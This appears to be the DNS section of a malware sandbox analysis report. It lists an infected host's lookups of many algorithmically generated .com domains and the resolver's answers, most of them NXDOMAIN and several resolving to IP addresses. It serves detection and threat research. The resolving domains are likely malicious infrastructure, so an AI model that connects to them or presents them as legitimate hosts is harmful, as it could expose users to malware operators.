                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448084116 CET192.168.2.101.1.1.10x3214Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448431969 CET192.168.2.101.1.1.10xa663Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448622942 CET192.168.2.101.1.1.10x644fStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448704958 CET192.168.2.101.1.1.10x92b9Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.448898077 CET192.168.2.101.1.1.10x2f53Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449328899 CET192.168.2.101.1.1.10xba60Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449351072 CET192.168.2.101.1.1.10xca49Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449613094 CET192.168.2.101.1.1.10x584fStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.449877024 CET192.168.2.101.1.1.10xa7afStandard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450001955 CET192.168.2.101.1.1.10xb3aaStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450458050 CET192.168.2.101.1.1.10xd28aStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450629950 CET192.168.2.101.1.1.10x3856Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.450860023 CET192.168.2.101.1.1.10xb75bStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452019930 CET192.168.2.101.1.1.10x5c5Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452150106 CET192.168.2.101.1.1.10x5c03Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.452513933 CET192.168.2.101.1.1.10xb81cStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.460697889 CET192.168.2.101.1.1.10xd705Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.462868929 CET192.168.2.101.1.1.10x2495Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.464242935 CET192.168.2.101.1.1.10x13b9Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.464889050 CET192.168.2.101.1.1.10x4008Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.466010094 CET192.168.2.101.1.1.10xeaeeStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.478637934 CET192.168.2.101.1.1.10x5ad0Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.478755951 CET192.168.2.101.1.1.10xb4ebStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.479387045 CET192.168.2.101.1.1.10xcbaStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.479523897 CET192.168.2.101.1.1.10x7e24Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.489439964 CET192.168.2.101.1.1.10x1f81Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.552287102 CET192.168.2.101.1.1.10xdcabStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.552767992 CET192.168.2.101.1.1.10x73dcStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.568840027 CET192.168.2.101.1.1.10xb01Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.569998980 CET192.168.2.101.1.1.10xfdf8Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.570137024 CET192.168.2.101.1.1.10x47eStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.576061010 CET192.168.2.101.1.1.10x8d4cStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.576370955 CET192.168.2.101.1.1.10x3581Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.577182055 CET192.168.2.101.1.1.10xe594Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.583647013 CET192.168.2.101.1.1.10x6c86Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.594172955 CET192.168.2.101.1.1.10x2918Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.595664024 CET192.168.2.101.1.1.10xb509Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597062111 CET192.168.2.101.1.1.10x1aefStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.597559929 CET192.168.2.101.1.1.10x43eeStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.599651098 CET192.168.2.101.1.1.10xe367Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.600317955 CET192.168.2.101.1.1.10x14e3Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.604445934 CET192.168.2.101.1.1.10xe545Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.613607883 CET192.168.2.101.1.1.10x7fc1Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.614144087 CET192.168.2.101.1.1.10xd4c9Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.615062952 CET192.168.2.101.1.1.10x3720Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.631076097 CET192.168.2.101.1.1.10xa4e4Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.631675005 CET192.168.2.101.1.1.10x3518Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.631983995 CET192.168.2.101.1.1.10xcb0Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.632461071 CET192.168.2.101.1.1.10x9c51Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.632800102 CET192.168.2.101.1.1.10x7ad0Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.672821045 CET192.168.2.101.1.1.10x5380Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.674236059 CET192.168.2.101.1.1.10x2cbaStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.675501108 CET192.168.2.101.1.1.10x8d4bStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.680279970 CET192.168.2.101.1.1.10xece7Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.682423115 CET192.168.2.101.1.1.10xe078Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.684359074 CET192.168.2.101.1.1.10xa155Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.690896034 CET192.168.2.101.1.1.10xa7fdStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.701034069 CET192.168.2.101.1.1.10xae45Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.735529900 CET192.168.2.101.1.1.10x955aStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.736126900 CET192.168.2.101.1.1.10x8d68Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.737073898 CET192.168.2.101.1.1.10x64c6Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.737402916 CET192.168.2.101.1.1.10xe941Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738034964 CET192.168.2.101.1.1.10xbb06Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738289118 CET192.168.2.101.1.1.10x13ecStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.738789082 CET192.168.2.101.1.1.10x6640Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.755769968 CET192.168.2.101.1.1.10xe8cdStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.756272078 CET192.168.2.101.1.1.10x13a1Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.758027077 CET192.168.2.101.1.1.10x4a03Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.758368015 CET192.168.2.101.1.1.10x38ffStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.758601904 CET192.168.2.101.1.1.10xbcfbStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.759037018 CET192.168.2.101.1.1.10x3bbaStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.774739027 CET192.168.2.101.1.1.10xaaecStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.774920940 CET192.168.2.101.1.1.10x171aStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.775080919 CET192.168.2.101.1.1.10x6723Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.775500059 CET192.168.2.101.1.1.10x9aa2Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784375906 CET192.168.2.101.1.1.10xa900Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784569025 CET192.168.2.101.1.1.10xaab0Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.786775112 CET192.168.2.101.1.1.10xc4b3Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.965285063 CET192.168.2.101.1.1.10xe840Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.968156099 CET192.168.2.101.1.1.10x45eStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.969270945 CET192.168.2.101.1.1.10x8736Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.970442057 CET192.168.2.101.1.1.10xf36Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.984575033 CET192.168.2.101.1.1.10xd8e5Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.009614944 CET192.168.2.101.1.1.10x8dd2Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.014250994 CET192.168.2.101.1.1.10x9d05Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.014503002 CET192.168.2.101.1.1.10x818aStandard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.031322002 CET192.168.2.101.1.1.10xfb9Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.033557892 CET192.168.2.101.1.1.10xd1cdStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.148528099 CET192.168.2.101.1.1.10xf4daStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.172677040 CET192.168.2.101.1.1.10x52d4Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.199872971 CET192.168.2.101.1.1.10x179Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.197657108 CET192.168.2.101.1.1.10xd833Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.197657108 CET192.168.2.101.1.1.10x4f50Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198004007 CET192.168.2.101.1.1.10xe866Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198312044 CET192.168.2.101.1.1.10x30bcStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198354006 CET192.168.2.101.1.1.10xf23bStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198662996 CET192.168.2.101.1.1.10xf310Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198848963 CET192.168.2.101.1.1.10xcb45Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.199157953 CET192.168.2.101.1.1.10xa6d9Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.199181080 CET192.168.2.101.1.1.10xe37Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.209047079 CET192.168.2.101.1.1.10xadd6Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.209069014 CET192.168.2.101.1.1.10xf3bcStandard query (0)pujyjav.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.702897072 CET1.1.1.1192.168.2.100x5617Name error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.703175068 CET1.1.1.1192.168.2.100xd67bName error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.705018044 CET1.1.1.1192.168.2.100x4077Name error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.729621887 CET1.1.1.1192.168.2.100x9cfbName error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.732230902 CET1.1.1.1192.168.2.100x8ccbName error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.739361048 CET1.1.1.1192.168.2.100xb263Name error (3)qeqyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.740472078 CET1.1.1.1192.168.2.100xed8eName error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.756906986 CET1.1.1.1192.168.2.100xebdeName error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.758949995 CET1.1.1.1192.168.2.100x925eName error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.767708063 CET1.1.1.1192.168.2.100x8ae4Name error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.768521070 CET1.1.1.1192.168.2.100x4ce3Name error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.039161921 CET1.1.1.1192.168.2.100xdac2Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.173723936 CET1.1.1.1192.168.2.100xab6cNo error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.176280022 CET1.1.1.1192.168.2.100xe5f8Name error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.177328110 CET1.1.1.1192.168.2.100x3109Name error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.237447023 CET1.1.1.1192.168.2.100x5bb2Name error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.254580975 CET1.1.1.1192.168.2.100x4b70Name error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.254833937 CET1.1.1.1192.168.2.100xaf76Name error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.256267071 CET1.1.1.1192.168.2.100xeb18Name error (3)volyqat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.258232117 CET1.1.1.1192.168.2.100xb4e1Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.259155989 CET1.1.1.1192.168.2.100xfce6Name error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.280380964 CET1.1.1.1192.168.2.100x8cb8Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.283776999 CET1.1.1.1192.168.2.100x2e20Name error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.290913105 CET1.1.1.1192.168.2.100xf81bName error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.309039116 CET1.1.1.1192.168.2.100x6042Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.310343027 CET1.1.1.1192.168.2.100x217cName error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.310373068 CET1.1.1.1192.168.2.100x7161Name error (3)lyxywer.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.367841005 CET1.1.1.1192.168.2.100xb7f5Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.371342897 CET1.1.1.1192.168.2.100x15b5Name error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.372226000 CET1.1.1.1192.168.2.100xc593Name error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.372875929 CET1.1.1.1192.168.2.100x31baName error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.374099016 CET1.1.1.1192.168.2.100x4895Name error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.393404961 CET1.1.1.1192.168.2.100xcfecName error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.398977041 CET1.1.1.1192.168.2.100x5af9No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.398977041 CET1.1.1.1192.168.2.100x5af9No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.450467110 CET1.1.1.1192.168.2.100x8f0No error (0)lymyxid.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.475507021 CET1.1.1.1192.168.2.100xbbd1No error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.475507021 CET1.1.1.1192.168.2.100xbbd1No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.542828083 CET1.1.1.1192.168.2.100x914fNo error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.542828083 CET1.1.1.1192.168.2.100x914fNo error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.549916029 CET1.1.1.1192.168.2.100xa3f9Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.556946993 CET1.1.1.1192.168.2.100xb96cName error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.697880983 CET1.1.1.1192.168.2.100x68e3Name error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.700841904 CET1.1.1.1192.168.2.100x6926Name error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.701288939 CET1.1.1.1192.168.2.100x3cb6Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.704186916 CET1.1.1.1192.168.2.100xcfedName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.710870028 CET1.1.1.1192.168.2.100x1fc0Name error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.722750902 CET1.1.1.1192.168.2.100xde5fName error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.732950926 CET1.1.1.1192.168.2.100x5c9eName error (3)gacyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.736721039 CET1.1.1.1192.168.2.100x9714Name error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.739650011 CET1.1.1.1192.168.2.100xb67dName error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.755935907 CET1.1.1.1192.168.2.100x51c9No error (0)puzylyp.com99.83.170.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.755935907 CET1.1.1.1192.168.2.100x51c9No error (0)puzylyp.com75.2.71.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.800977945 CET1.1.1.1192.168.2.100xd430Name error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.821202993 CET1.1.1.1192.168.2.100x318fName error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.840799093 CET1.1.1.1192.168.2.100x5c0cName error (3)pumyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.842366934 CET1.1.1.1192.168.2.100xe4dbName error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.844266891 CET1.1.1.1192.168.2.100x5feName error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.845145941 CET1.1.1.1192.168.2.100x388fName error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.943121910 CET1.1.1.1192.168.2.100x7a1aName error (3)vonyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.967415094 CET1.1.1.1192.168.2.100x1cfbName error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.002856970 CET1.1.1.1192.168.2.100xf408No error (0)qetyfuv.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.017436028 CET1.1.1.1192.168.2.100xb022No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.054663897 CET1.1.1.1192.168.2.100x4889No error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.087069988 CET1.1.1.1192.168.2.100xee4No error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.174948931 CET1.1.1.1192.168.2.100xa45dServer failure (2)lysyfyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.428297043 CET1.1.1.1192.168.2.100x7e8eNo error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com178.162.203.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com178.162.203.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com178.162.203.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
